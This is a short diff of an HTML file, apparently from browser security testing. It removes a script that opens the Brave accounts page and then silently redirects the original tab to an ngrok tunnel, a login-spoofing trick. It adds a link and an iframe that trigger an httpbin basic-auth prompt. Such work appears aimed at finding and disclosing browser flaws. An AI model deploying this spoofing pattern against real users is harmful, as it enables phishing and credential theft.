--- a/auth.html
+++ b/auth.html
@@ -1,19 +1,7 @@
 <html>
-  <head>
-  <script>
-    function spoof() {
-      setTimeout(showAuthentication, 1000);
-      window.open('https://accounts.brave.com', 'brave');
-     }
-     function showAuthentication() {
-        document.location = "https://6fc1-125-165-35-241.ngrok-free.app";
-       
+<body>
+    <a href="https://httpbin.org/basic-auth/user/passwd">xsss</a>
 
-     }
-   </script>
-  </head>
-  <body>
-    <a href="#" onclick="spoof()">Tap me!</a>
-  </body>
+    <iframe src="https://httpbin.org/basic-auth/user/passwd"></iframe>
+</body>
 </html>
-
